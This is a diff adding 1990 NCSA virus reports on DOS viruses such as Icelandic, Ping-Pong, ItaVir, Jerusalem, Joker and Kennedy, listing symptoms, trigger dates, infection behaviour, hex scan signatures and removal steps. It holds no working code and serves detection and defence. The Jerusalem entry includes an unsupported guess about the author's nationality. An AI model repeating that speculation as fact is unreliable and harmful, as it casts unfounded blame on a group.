(c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa072.txt b/textfiles.com/virus/NCSA/ncsa072.txt new file mode 100644 index 00000000..e538ec91 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa072.txt @@ -0,0 +1,73 @@ + Ŀ + VIRUS REPORT + Icelandic Virus Version 2 + + +Synonyms: System Virus, One in Ten virus + +Date of Origin: July, 1989. + +Place of Origin: Iceland. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects EXE files. + +Increase in Size of Infected Files: 632 or 661 bytes. + +Nature of Damage: Affects system run-time operation. Corrupts program or +overlay files. + +Detected by: Scanv56+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, Scan/D, or F-Prot. + +Derived from: Icelandic virus. + +Scan Code: You can search at offset 0B8H for 2E C6 06 79 02 02 90 50 53 +51. + + This version of the Icelandic virus differs from the Icelandic in +that it bypasses INT21 and doesn't have the code to mark a cluster bad. +It doesn't have the INT13 check that the second version does. + + Each time the Icelandic-II virus infects a program, it will modify +the file's date, thus making it fairly obvious that the program has been +changed. The virus will also remove the read-only attribute from files, +but does not restore it after infecting the program. + + The Icelandic-II virus can infect programs even if the system is +running an anti-viral TSR that monitors interrupt 21, such as FluShot+. + + On hard disks larger than 10 MB, there are no bad sectors marked in +the FAT as there is with the Icelandic virus. + + Although this version has been called version 2, it may actually have +been the first released draft, and the Icelandic 1 may be the second. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa073.txt b/textfiles.com/virus/NCSA/ncsa073.txt new file mode 100644 index 00000000..35b835ae --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa073.txt @@ -0,0 +1,69 @@ + Ŀ + VIRUS REPORT + Icelandic Virus Version 3 + + +Synonyms: December 24th virus + +Date of Origin: December, 1989. + +Place of Origin: Iceland. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects EXE files. + +OnScreen Symptoms: The message "Gledelig jol" may appear on December 24. + +Increase in Size of Infected Files: 843, 853, or 863 bytes. + +Nature of Damage: Affects system run-time operation. Corrupts program +files. + +Detected by: Scanv57+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, Scan/D, or F-Prot, or delete infected files. + +Derived from: Icelandic virus. + +Scan Code: May be identified by the last four bytes of an infected +program, "1844,195F"H -- a reversal of the ID of Icelandic I and II. You +can also search at offset 106H for 2E C6 06 6F 02 0A 90 50 53 51. + + The Icelandic-III virus is very similar to the Icelandic Virus, from +which it was adapted. There are minor changes including the addition of +several NOP instructions. + + This virus will not infect any program previously infected by +Icelandic or Icelandic-II. + + If an infected program is run on December 24th of any year, programs +subsequently run will be stopped, later displaying the message "Gledileg +jol" ("Merry Christmas" in Icelandic) instead. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa074.txt b/textfiles.com/virus/NCSA/ncsa074.txt new file mode 100644 index 00000000..ebde33a3 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa074.txt @@ -0,0 +1,41 @@ + Ŀ + VIRUS REPORT + IRQ Ver 41.0 Virus + + +Host Machine: PC compatibles. + + The IRQ virus attacks the file C:dir as well as the first executable +file that it finds listed in your startup-sequence files. It is to your +advantage to check all your disks startup files and the first executable +file referenced once infected with the IRQ virus. + +KV (KillVirus) will detect the IRQ Ver 41.0 virus in an executable file +and remove the virus from the file. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa075.txt b/textfiles.com/virus/NCSA/ncsa075.txt new file mode 100644 index 00000000..ed38df52 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa075.txt @@ -0,0 +1,87 @@ + Ŀ + VIRUS REPORT + Italian Virus + + +Synonyms: Bouncing Ball, Vera Cruz, Ping-Pong, Bouncing Dot, Missouri +virus. + +Date of Origin: March, 1988. + +Host Machine: PC compatibles. Original version won't infect 80286 or +80386 computers or hard disks. + +Host Files: Remains resident. Infects boot sector on any disk with at +least two sectors per cluster. + +OnScreen Symptoms: A bouncing ball or dot may appear on the screen upon +activation. + +Increase in Size of Infected Files: n/a. + +Nature of Damage: Affects system run-time operation. Corrupts or +overwrites boot sector. Does no apparent damage. + +Detected by: Scanv56+, F-Prot, IBM Scan. + +Removed by: CleanUp, MDisk, F-Prot, or DOS SYS command. + +Scan Code: 8E D8 A1 13 04 2D 02 00 A3 13 04 B1 06 D3 E0 2D C0 07 8E C0 BE +00 7C 8B FE B9 00. You can also search at offset 07CH for C7 06 4C 00 D0 +7C 8C 0E 4E 00. + +Description of Operation: This is a boot sector virus. Some forms infect +only floppies, others will also infect the boot sector of hard disks. +This virus consists of a boot sector and 1 cluster (2 sectors used) +marked as bad in the first copy of the FAT. The first of these sectors +contains the rest of the virus, and the second contains the original boot +sector. It infects all disks which have at least two sectors per +cluster, and it occupies 2K of memory. + + When this virus activates (randomly) a bouncing dot/bouncing diamond +(ASCII 4) /bouncing smiley face (ASCII 2) appears on the +screen and can only be removed through reboot. The virus can be triggered +by a disk access, should one occur during a one second window that occurs +about every half hour. When triggered, the dot bounces off the edges of +the screen, and passes through any text, with replacement after it. +Sometime, this doesn't work properly, the bouncing character interacts +with the characters on the screen, and screen displays are messed up. +Infected diskettes have 1K in bad sectors, infected hard disks have 2K +(and other numbers of bad sectors are possible). No known intentional +damage. Unintentional damage - the two copies of the FAT are left +different; DOS might not like this. Attempts to infect diskettes slows +them down, and some computers won't read floppies, due to time-outs. No +other damage is done. + +Recovery: Recover by powering down the system, and then using a +write-protected DOS disk to boot. Use the SYS command from the floppy to +attempt to re-create a good boot sector. Alternatively, use the program +MD. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa076.txt b/textfiles.com/virus/NCSA/ncsa076.txt new file mode 100644 index 00000000..1d79af0b --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa076.txt @@ -0,0 +1,71 @@ + Ŀ + VIRUS REPORT + Italian-B + + +Synonyms: Bouncing Ball, Vera Cruz, Ping-Pong-B, Bouncing Dot. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects floppy and hard disk boot sectors. +(The original infected only floppy disks). + +Increase in Size of Infected Files: n/a. + +Nature of Damage: Affects system run-time operation. Corrupts program or +overlay files. + +Detected by: Scanv56+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, MDisk, F-Prot, or DOS SYS command. + +Derived from: Italian. + + This is a variation of Italian that is able to infect hard disks. + + Some of the characteristics are: + +* Fairly long time before activation (a number of minutes at least) + +* It displays a ball character, not the Diamond Character + +* Once activated, the ball bounces around the screen until the system + is shut off. + +* Formatted system & non-system disks are infected and have the one bad + spot created by the virus. + +* When a user attempts to format the hard disk, format scans the disk OK + and then reports that track 0 is bad. + +* Formatted system floppy disks tend to lock up the PC on boot, and warm + reboot doesn't work. + +* The main problem is re-infection and spreading to other machines. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa077.txt b/textfiles.com/virus/NCSA/ncsa077.txt new file mode 100644 index 00000000..343d17a3 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa077.txt @@ -0,0 +1,58 @@ + Ŀ + VIRUS REPORT + ItaVir + + +Synonyms: 3880 virus + +Date of Origin: March, 1990. + +Place of Origin: Milan, Italy. + +Host Machine: PC compatibles. + +Host Files: EXE files. Non-resident. + +Increase in Size of Infected Files: 3,880 bytes + +Detected by: Scan v.60+. + +Removed by: Scan/D, or delete whatever is infected. + + Recognition of this virus is straightforward. EXE files will grow in +length by 3,880 bytes, and a file named ?OMMAND.COM (where ? is a non- +printing character) will be found on the disk. This file contains the +virus, and is used as a source of the code during infection. + + Itavir won't activate until it has been in the system for 24 hours or +more. Upon activation, it corrupts the boot sector, so that the system +will not boot after power down. A message (in Italian) is displayed, and +ASCII codes 0-255 are sent to all ports. Some monitors will flicker or +(if VGA) will hiss when this occurs. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa078.txt b/textfiles.com/virus/NCSA/ncsa078.txt new file mode 100644 index 00000000..a29fa37d --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa078.txt @@ -0,0 +1,170 @@ + Ŀ + VIRUS REPORT + Jerusalem Virus + + +Synonyms: Israeli, Friday the 13th, Black Hole, Black Box, PLO, 1808 +(EXE), 1813 (COM), sUMsDos, Russian. + +Date of Origin: December 24, 1987 (date first detected in Israel). + +Place of Origin: Israel. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects COM, EXE, overlay files. + +Increase in Size of Infected Files: 1808 bytes for EXE files (usually), +1813 bytes for COM files. + +Nature of Damage: Affects system run-time operation. Corrupts program or +overlay files. + +Detected by: Scanv56+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, UNVIRUS, IMMUNE, M-J, Scan/D/A, Saturday, F-Prot. + +Derived from: Suriv03 + +Scan Code: 8E D0 BC 00 07 50 B8 C5 00 50 CB FC 06 2E 8C 06 31 00 2E 8C 06 +39 00 2E 8C 06 3D 00 2E 8C 06 41 00 8C C0. You can also search at offset +095H for FC B4 E0 CD 21 80 FC E0 73 16. + + History: The Jerusalem virus was first discovered at the Hebrew +University in Jerusalem on December 24, 1987, and reported to the virus +research community by Y. Radai of the Hebrew University of Jerusalem. My +personal suspicion is that the virus was written by a Palestinian, or +other enemy of Israel, and planted within Israel. Israel was declared an +independent state on May 14, 1948. Friday, May 13, 1988 would have been +40 years in which Palestine was no longer sovereign. Although it was +detected in late 1987, it contained code to prevent it from going off +until May 13, 1988. Other viruses set to go off on Friday the 13th are +likely copy-cats, whose authors simply thought that Friday the 13th was +unlucky, wanted a trigger date, and thought this would do fine. + +Operation: This virus is a memory resident infector. Any "clean +program" run after an infected program is run will become infected. Both +COM and EXE files are infected. The virus occurs attached to the +beginning of a COM file, or the end of an EXE file. A COM file also has +the five-byte marker attached to the end. This marker is usually (but +not always) "MsDos", and is preceeded in the virus by "sU". "sUMsDos" is +not usually found in newer varieties of this virus. COM files increase +in length by 1813 bytes. EXE files usually increase by 1808 bytes, but +the displacement at which to write the virus is taken from the length in +the EXE header and not the actual length. This means that part or all of +this 1808 bytes may be overwritten on the end of the host program. + + It becomes memory-resident when the first infected program is run, +and it will then infect every program run except COMMAND.COM. COM files +are infected once only, EXE files are re-infected each time they are run. + + + Interrupt 8 is redirected. After the system has been infected for +thirty minutes (by running an infected program), an area of the screen +from row 5 column 5 to row 16 column 16 is scrolled up two lines creating +a black two line "window". From this point a time-wasting loop is +executed with each timer interrupt, slowing the system down by a factor +of 10. + + If the system was infected with a system date of Friday the +thirteenth, every program run will be deleted instead. This will +continue irrespective of the system date until the machine is rebooted. +The end of the virus, from offset 0600H, is rubbish and will vary from +sample to sample. + + Jerusalem contains a flaw which makes it re-infect EXE (but not COM) +files over and over (up to five times or until the file becomes too big +to fit into memory, whichever comes first.) + + The names 1808 and 1813 come from the fact that files grow by 1808 or +1813 bytes, without changing their date and time or read/write/hidden +attributes. COMMAND.COM does not grow, to help it avoid detection. In +fact, it seems likely that the disk version of COMMAND.COM is not +modified, but that the in-memory copy of COMMAND.COM is modified when an +infected program is run. + + The virus causes some intentional damage: + +* there is code in the virus for deleting each program that you run on + every Friday 13th. On January 13 (Friday), 1989, this virus made a + shambles of hundreds of PC-compatibles in Britain + +* The virus re-directs interrupt 8 (among others) and one-half hour + after an infected program loads, the new timer interrupt introduces a + delay which slows down the processor by a factor of 10. (see figure). + + It is difficult to estimate the total dollar value of damage done by +this virus to date. In just one case, reported in the Israeli newspaper +Maariv, it destroyed $15,000 worth of software and two disks in which +7,000 hours of work had been invested. + + Disinfection can be a complex process. UNVIRUS will easily +eradicate this virus and 5-6 others as well. IMMUNE will prevent further +infection. + + Alternatively, shareware programs written by Dave Chamber and +distributed through bulletin boards under the name M-J may be used. M-J +removes the virus from hard disks; M-JFA removes the virus from floppy +disks that are inserted into the system's A drive; M-JFB removes the +virus from floppy disks that are inserted into the system's B +drive. + + Alternatively, here is the process for removal: + +* power down the system. + +* Boot from a write-protected, clean system master diskette. + +* Delete all of the infected programs as indicated by VIRUSCAN. + +* Replace the programs from original write-protected program + distribution diskettes. + +* Do not execute any program from the infected hard disk until the + disinfection process is complete. + +* After cleaning all hard drives in the infected system, all floppies + that have come into contact with the system should be SCANned and + disinfected in the same manner. + + Another means of detection: using PCtools or another text search +utility, search for the ASCII string "sUMsDos". This string is present +in all copies of this particular virus strain. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa079.txt b/textfiles.com/virus/NCSA/ncsa079.txt new file mode 100644 index 00000000..729edb0b --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa079.txt @@ -0,0 +1,59 @@ + Ŀ + VIRUS REPORT + Jerusalem-B + + +Synonyms: Arab Star, Black Box, Black Window, Hebrew University + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects SYS, COM, EXE, overlay files. + +Increase in Size of Infected Files: 1808 bytes (EXE files), 1813 bytes +(COM files). Sometimes does not re-infect EXE files. + +Nature of Damage: Affects system run-time operation. Corrupts program +files. + +Detected by: Scanv56+, F-Prot, IBM Scan. + +Removed by: CleanUp, F-Prot, Saturday, M-Jruslm, UnVirus. + +Derived from: Jerusalem virus. + + This virus is identical to the Jerusalem except: + +* it is sometimes able to successfully identify pre-existing + infections in EXE files and may only infect them once. + +* It may not slow the system after infection. + + It is easily the most common of all PC viruses. It can infect SYS, +COM, EXE, and overlay files. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa080.txt b/textfiles.com/virus/NCSA/ncsa080.txt new file mode 100644 index 00000000..d611cdcd --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa080.txt @@ -0,0 +1,66 @@ + Ŀ + VIRUS REPORT + Jerusalem-C + + +Synonyms: the New Jerusalem. + +Date of Origin: October 14, 1989. + +Place of Origin: first reported in the Netherlands by Fidonet SYSOPS Jan +Terpstra and Ernst Raedecker. May have originated elsewhere in Europe. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects COM, EXE, SYS, BIN, PIF, overlay +files. + +Increase in Size of Infected Files: 1808 bytes (EXE), 1813 bytes (COM). + +Nature of Damage: Affects system run-time operation. Corrupts program or +overlay files. + +Detected by: Scanv45+, F-Prot. + +Removed by: CleanUp, Saturday, F-Prot. + +Derived from: Jerusalem-B. + + This virus seems to be a special version designed to elude virus +detectors, including McAfee's Scan versions prior to 45 and IBM's +VIRSCAN of October 20, 1989 and earlier. + + This virus is identical to Jerusalem-B except that the timer +interrupt delay code has been bypassed. That is, it will not slow your +computer when it has activated. This virus is virtually invisible until +it activates. It infects both .EXE and .COM files and activates on any +Friday the 13th, deleting infected programs when you attempt to run +them. This virus is memory resident, and as with the other Jerusalem +viruses, may infect overlay, .SYS, .BIN, and .PIF files. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa081.txt b/textfiles.com/virus/NCSA/ncsa081.txt new file mode 100644 index 00000000..216c7bc2 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa081.txt @@ -0,0 +1,39 @@ + Ŀ + VIRUS REPORT + Jerusalem-D + + +Host Machine: PC compatibles. + +Derived from: Jerusalem-C. + + This is the Jerusalem-C that destroys both versions of the FAT on any +Friday the 13th after 1990. The code that originally deleted executed +programs has been overwritten with the FAT destructive code. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa082.txt b/textfiles.com/virus/NCSA/ncsa082.txt new file mode 100644 index 00000000..699575a5 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa082.txt @@ -0,0 +1,38 @@ + Ŀ + VIRUS REPORT + Jerusalem-E + + +Host Machine: PC compatibles. + +Derived from: Jerusalem-D. + + This is identical to the Jerusalem-D variety except the activation +is any Friday the 13th after 1992. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa083.txt b/textfiles.com/virus/NCSA/ncsa083.txt new file mode 100644 index 00000000..0c195e17 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa083.txt @@ -0,0 +1,97 @@ + Ŀ + VIRUS REPORT + Joker + + +Synonyms: Jocker + +Date of Origin: December, 1989. + +Place of Origin: Poland. + +Host Machine: PC compatibles. + +Host Files: Non resident. Infects EXE files. + +OnScreen Symptoms: Infected programs display bogus error messages. + +Nature of Damage: Damages program files. + +Detected by: Scanv57+, Pro-Scan. + +Removed by: CleanUp, Scan/D, or delete infected files. + + The Joker was isolated in Poland in December, 1989. This virus is a +generic .EXE file infector, and is a poor replicator (ie. it does not +quickly infect other files). + + Infected programs will display bogus error messages and comments, +which cam be found in the infected files at the beginning of the viral +code. Some of the messages and comments include: + +Incorrect DOS version + +Invalid Volume ID Format failure + +Please put a new disk into drive A: + +End of input file + +END OF WORKTIME. TURN SYSTEM OFF! + +Divide Overflow + +Water detect in Co-processor + +I am hungry! Insert HAMBURGER into drive A: + +NO SMOKING, PLEASE! + +Thanks. + +Don't beat me !! + +Don't drink and drive. + +Another cup of cofee ? + +OH, YES! + +Hard Disk head has been destroyed. Can you borrow me your one? + +Missing light magenta ribbon in printer! + +In case mistake, call GHOST BUSTERS + +Insert tractor toilet paper into printer. + + This virus may also alter .DBF files, adding messages to them. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa084.txt b/textfiles.com/virus/NCSA/ncsa084.txt new file mode 100644 index 00000000..64ff243f --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa084.txt @@ -0,0 +1,55 @@ + Ŀ + VIRUS REPORT + Jork Virus + + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects floppy disk boot sector. + +Increase in Size of Infected Files: n/a. + +Nature of Damage: Corrupts or overwrites boot sector. + +Derived from: Shoe_virus (Ashar). + + This virus is exactly the same as the Shoe_virus (Ashar) in +operation. It was patched to replace offset 0202H, which reads as +follows in the Shoe virus: + +(c) 1986 Brain & Amjads (pvt) Ltd + + with + +(c) 1986 Jork & Amjads (pvt) Ltd + + Another patch the author made to the Shoe_virus was to reduce the +identifying text at offset 0010H to "Welcome to the Dungeon (c) 1986 +Brain". + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa085.txt b/textfiles.com/virus/NCSA/ncsa085.txt new file mode 100644 index 00000000..aaabc35b --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa085.txt @@ -0,0 +1,51 @@ + Ŀ + VIRUS REPORT + June 16th Virus + + +Synonyms: Pretoria virus + +Date of Origin: April, 1990 + +Place of Origin: South Africa. + +Host Machine: PC compatibles. + +Host Files: COM files including COMMAND.COM. Non-resident. + +OnScreen Symptoms: A large hard disk may slow down during infection. + +Increase in Size of Infected Files: 879 bytes. + +Nature of Damage: Infects all COM files on the hard disk when an infected +program is first run. Erases all entries in root directory on any June +16. All FAT entries are replaced with tye word "ZAPPED". + +Scan Code: encrypted. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa086.txt b/textfiles.com/virus/NCSA/ncsa086.txt new file mode 100644 index 00000000..62b74f65 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa086.txt @@ -0,0 +1,52 @@ + Ŀ + VIRUS REPORT + Kennedy Virus + + +Synonyms: Dead Kennedy + +Date of Origin: April, 1990 + +Host Machine: PC compatibles. + +Host Files: COM files other than COMMAND.COM + +Increase in Size of Infected Files: 333 bytes. + +Nature of Damage: not destructive. + +Removed by: delete any infected files. + +Scan Code: In the virus, you can find the following text strings: +"\command.com" and "The Dead Kennedys". + + This virus activates on three dates: June 6, November 18, and +November 22. November 22 is the date of the assassination of John F. +Kennedy. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: 